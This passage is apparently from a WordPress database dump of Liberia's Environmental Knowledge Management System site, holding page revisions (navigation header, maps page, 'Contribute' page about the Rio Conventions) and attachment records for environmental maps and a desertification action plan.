href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://ekmsliberia.info/newsletter/\">Subscribe</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-12-05 02:13:46','2019-12-05 02:13:46','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2924,1,'2019-12-05 02:15:27','2019-12-05 02:15:27','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join Us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Sign up, It\'s Free!\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li id=\"menu-item-2921\"><a target=\"_blank\" href=\"https://ekmsliberia.info/newsletter/\" rel=\"noopener noreferrer\">Subscribe</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://ekmsliberia.info/newsletter/\">Subscribe</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-12-05 02:15:27','2019-12-05 02:15:27','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2925,1,'2019-12-05 02:16:21','2019-12-05 02:16:21','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join Us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Sign up, It\'s Free!\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li id=\"menu-item-2921\"><a target=\"_blank\" href=\"https://ekmsliberia.info/newsletter/\" rel=\"noopener noreferrer\">Subscribe</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://ekmsliberia.info/newsletter/\">Subscribe</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-12-05 02:16:21','2019-12-05 02:16:21','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2926,1,'2019-12-05 02:17:11','2019-12-05 02:17:11','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join Us to help grow <br>the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Sign up, It\'s Free!\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li id=\"menu-item-2921\"><a target=\"_blank\" href=\"https://ekmsliberia.info/newsletter/\" rel=\"noopener noreferrer\">Subscribe</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://ekmsliberia.info/newsletter/\">Subscribe</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-12-05 02:17:11','2019-12-05 02:17:11','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2928,1,'2019-12-07 08:48:43','2019-12-07 08:48:43','','country_forest_cover','','inherit','open','closed','','country_forest_cover','','','2019-12-07 08:48:43','2019-12-07 08:48:43','',1709,'https://ekmsliberia.info/wp-content/uploads/2019/11/country_forest_cover.png',0,'attachment','image/png',0),(2935,1,'2019-12-12 12:46:19','2019-12-12 12:46:19','','featured_news_plastic_waste','','inherit','open','closed','','featured_news_plastic_waste','','','2019-12-12 12:46:19','2019-12-12 12:46:19','',2911,'https://ekmsliberia.info/wp-content/uploads/2019/12/featured_news_plastic_waste.png',0,'attachment','image/png',0),(2936,1,'2019-12-12 12:49:01','2019-12-12 12:49:01','<!-- wp:paragraph -->\n<p>This is a story about the 2019 Young Entrepreneurs Awards winner: Prince Kwame Agbata, a youth who started up an initiative to tackle poor waste management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href=\"https://www.unilever.com/about/inspiringaction/unilever-young-entrepreneurs-awards/awards-2019/coliba/\">https://www.unilever.com/about/inspiringaction/unilever-young-entrepreneurs-awards/awards-2019/coliba/</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','How tragedy inspired one young entrepreneur to tackle Ghana’s plastic waste crisis','','inherit','closed','closed','','2911-revision-v1','','','2019-12-12 12:49:01','2019-12-12 12:49:01','',2911,'https://ekmsliberia.info/2911-revision-v1/',0,'revision','',0),(2939,1,'2019-12-24 12:14:20','2019-12-24 12:14:20','This National Action Plan is Aligned with the UNCCD\'s Strategic Plan.','Liberia Aligned NAP','Liberia Aligned National Action Plan to Combat Desertification, Land Degradation and Drought.','inherit','open','closed','','liberia-aligned-nap','','','2019-12-24 12:16:54','2019-12-24 12:16:54','',1872,'https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-Aligned-NAP.pdf',0,'attachment','application/pdf',0),(2940,1,'2019-12-24 12:17:35','2019-12-24 12:17:35','<a href=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-Aligned-NAP.pdf\">Liberia Aligned NAP</a> Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management.\r\n\r\nThe Convention addresses specifically the arid, semi-arid and dry sub-humid areas, known as the drylands, where some of the most vulnerable ecosystems and peoples can be found.\r\n\r\nWebsite: <a href=\"https://www.unccd.int/\">www.unccd.int</a>','United Nations Convention to Combat Desertification','','inherit','closed','closed','','1872-autosave-v1','','','2019-12-24 12:17:35','2019-12-24 12:17:35','',1872,'https://ekmsliberia.info/1872-autosave-v1/',0,'revision','',0),(2942,1,'2019-12-24 13:02:50','2019-12-24 13:02:50','','Liberia-Land-Cover-Map-2015','','inherit','open','closed','','liberia-land-cover-map-2015','','','2019-12-24 13:02:50','2019-12-24 13:02:50','',108,'https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Land-Cover-Map-2015.jpg',0,'attachment','image/jpeg',0),(2944,1,'2019-12-24 13:05:18','2019-12-24 13:05:18','','LBR_Soil_Map','','inherit','open','closed','','lbr_soil_map','','','2019-12-24 13:05:18','2019-12-24 13:05:18','',108,'https://ekmsliberia.info/wp-content/uploads/2019/12/LBR_Soil_Map.png',0,'attachment','image/png',0),(2945,1,'2019-12-24 13:07:54','2019-12-24 13:07:54','','Liberia-Extreme-Poverty-Map','','inherit','open','closed','','liberia-extreme-poverty-map','','','2019-12-24 13:07:54','2019-12-24 13:07:54','',108,'https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Extreme-Poverty-Map.jpg',0,'attachment','image/jpeg',0),(2946,1,'2019-12-24 13:12:34','2019-12-24 13:12:34','','Liberia-Land-Cover-Map-2015-1','','inherit','open','closed','','liberia-land-cover-map-2015-1','','','2019-12-24 13:12:34','2019-12-24 13:12:34','',108,'https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Land-Cover-Map-2015-1.jpg',0,'attachment','image/jpeg',0),(2947,1,'2019-12-24 13:13:42','2019-12-24 13:13:42','','Liberia-Species-Richness-High-Biodiversity-Corridor-Map2','','inherit','open','closed','','liberia-species-richness-high-biodiversity-corridor-map2','','','2019-12-24 13:13:42','2019-12-24 13:13:42','',108,'https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Species-Richness-High-Biodiversity-Corridor-Map2.jpg',0,'attachment','image/jpeg',0),(2948,1,'2019-12-24 13:16:31','2019-12-24 13:16:31','','Liberia-Extreme-Poverty-Map-1','','inherit','open','closed','','liberia-extreme-poverty-map-1','','','2019-12-24 13:16:31','2019-12-24 13:16:31','',108,'https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Extreme-Poverty-Map-1.jpg',0,'attachment','image/jpeg',0),(2949,1,'2019-12-24 13:25:56','2019-12-24 13:25:56','<!-- wp:paragraph -->\n<p> Coming soon! </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"ids\":[2946]} -->\n<figure class=\"wp-block-gallery columns-1 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Land-Cover-Map-2015-1-1024x791.jpg\" alt=\"\" data-id=\"2946\" data-full-url=\"https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Land-Cover-Map-2015-1-scaled.jpg\" data-link=\"https://ekmsliberia.info/maps/liberia-land-cover-map-2015-1/\" class=\"wp-image-2946\"/></figure></li></ul><figcaption class=\"blocks-gallery-caption\"><strong>Liberia Land Cover Map</strong></figcaption></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:gallery {\"ids\":[2947]} -->\n<figure class=\"wp-block-gallery columns-1 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Species-Richness-High-Biodiversity-Corridor-Map2-1024x791.jpg\" alt=\"\" data-id=\"2947\" data-full-url=\"https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Species-Richness-High-Biodiversity-Corridor-Map2-scaled.jpg\" data-link=\"https://ekmsliberia.info/maps/liberia-species-richness-high-biodiversity-corridor-map2/\" class=\"wp-image-2947\"/></figure></li></ul><figcaption class=\"blocks-gallery-caption\"><strong> Liberia Species Richness Map </strong></figcaption></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":2948} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Extreme-Poverty-Map-1-1024x791.jpg\" alt=\"\" class=\"wp-image-2948\"/><figcaption><strong>Liberia Extreme Poverty Map by Region (HIES 2014)</strong></figcaption></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:jetpack/map {\"points\":[{\"placeTitle\":\"Liberia\",\"title\":\"Liberia\",\"caption\":\"Liberia\",\"id\":\"country.11981004792290980\",\"coordinates\":{\"longitude\":-9.75,\"latitude\":6.53333}}],\"zoom\":11.292581973058338} -->\n<div class=\"wp-block-jetpack-map\" data-map-style=\"default\" data-map-details=\"true\" data-points=\"[{&quot;placeTitle&quot;:&quot;Liberia&quot;,&quot;title&quot;:&quot;Liberia&quot;,&quot;caption&quot;:&quot;Liberia&quot;,&quot;id&quot;:&quot;country.11981004792290980&quot;,&quot;coordinates&quot;:{&quot;longitude&quot;:-9.75,&quot;latitude&quot;:6.53333}}]\" data-zoom=\"11.292581973058338\" data-map-center=\"{&quot;longitude&quot;:-122.41941550000001,&quot;latitude&quot;:37.7749295}\" data-marker-color=\"red\"><ul><li><a href=\"https://www.google.com/maps/search/?api=1&amp;query=6.53333,-9.75\">Liberia</a></li></ul></div>\n<!-- /wp:jetpack/map -->','Maps','','inherit','closed','closed','','108-revision-v1','','','2019-12-24 13:25:56','2019-12-24 13:25:56','',108,'https://ekmsliberia.info/108-revision-v1/',0,'revision','',0),(2951,1,'2020-02-06 09:20:17','2020-02-06 09:20:17','<h2>Contribute a knowledge resource to the EKMS</h2>		\n		<p>Ekmsliberia.info is managed by the <a style=\"color: #00ccff;\" href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\" target=\"_blank\" rel=\"noopener noreferrer\">Environmental Protection Agency (EPA)</a> of Liberia in collaboration with several partner governmental and other institutions.</p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia. If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.</p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific/peer-review publications, technical documents/reports, policy briefs, educational/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.</p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\"/join-the-community\" target=\"_blank\" rel=\"noopener noreferrer\">‘Join the Community’</a> page.</p><p><a href=\"https://ekmsliberia.info/contact-us/\" target=\"_blank\" rel=\"noopener noreferrer\">Contact us</a> to send us more information!</p>','Contribute','','inherit','closed','closed','','74-revision-v1','','','2020-02-06 09:20:17','2020-02-06 09:20:17','',74,'https://ekmsliberia.info/74-revision-v1/',0,'revision','',0),(2952,1,'2020-02-06 10:12:56','2020-02-06 10:12:56','<h2>Contribute a knowledge resource to the EKMS</h2>		\n		<p>Ekmsliberia.info is managed by the <a style=\"color: #00ccff;\" href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\" target=\"_blank\" rel=\"noopener noreferrer\">Environmental Protection Agency (EPA)</a> of Liberia in collaboration with several partner governmental and other institutions.</p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia. If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.</p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific/peer-review publications, technical documents/reports, policy briefs, educational/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.</p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\"/join-the-community\" target=\"_blank\" rel=\"noopener noreferrer\">‘Join the Community’</a> page.</p><p><a style=\"color: #3366ff;\" href=\"https://ekmsliberia.info/contact-us/\" target=\"_blank\" rel=\"noopener noreferrer\">Contact us</a> to send us more information!</p>','Contribute','','inherit','closed','closed','','74-revision-v1','','','2020-02-06 10:12:56','2020-02-06 10:12:56','',74,'https://ekmsliberia.info/74-revision-v1/',0,'revision','',0),(2953,1,'2020-02-06 10:13:59','2020-02-06 10:13:59','<h2>Contribute a knowledge resource to the EKMS</h2>		\n		<p>Ekmsliberia.info is managed by the <a style=\"color: #00ccff;\" href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\" target=\"_blank\" rel=\"noopener noreferrer\">Environmental Protection Agency (EPA)</a> of Liberia in collaboration with several partner governmental and other institutions.</p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia. If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.</p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific/peer-review publications, technical documents/reports, policy briefs, educational/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.</p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\"/join-the-community\" target=\"_blank\" rel=\"noopener noreferrer\">‘Join the Community’</a> page.</p><p><a style=\"color: #3366ff;\" href=\"https://ekmsliberia.info/contact-us/\" target=\"_blank\" rel=\"noopener noreferrer\">Contact us</a> if you are interested in contributing to the EKMS!</p>','Contribute','','inherit','closed','closed','','74-revision-v1','','','2020-02-06 10:13:59','2020-02-06 10:13:59','',74,'https://ekmsliberia.info/74-revision-v1/',0,'revision','',0),(2954,1,'2020-02-06 10:14:18','2020-02-06 10:14:18','<h2>Contribute a knowledge resource to the EKMS</h2>\nEkmsliberia.info is managed by the <a style=\"color: #00ccff;\" href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\" target=\"_blank\" rel=\"noopener noreferrer\">Environmental Protection Agency (EPA)</a> of Liberia in collaboration with several partner governmental and other institutions.\n\nWe are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia.&nbsp;If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.\n\nThis site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific/peer-review publications, technical documents/reports, policy briefs, educational/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.\n\nTo learn about becoming a member of the EKMS Community, visit our <a href=\"/join-the-community\" target=\"_blank\" rel=\"noopener noreferrer\">‘Join the Community’</a> page.\n\n<a style=\"color: #3366ff;\" href=\"https://ekmsliberia.info/contact-us/\" target=\"_blank\" rel=\"noopener noreferrer\">Contact us</a> if you are interested in contributing to the EKMS!','Contribute','','inherit','closed','closed','','74-revision-v1','','','2020-02-06 10:14:18','2020-02-06 10:14:18','',74,'https://ekmsliberia.info/74-revision-v1/',0,'revision','',0),(2956,38,'2020-02-06 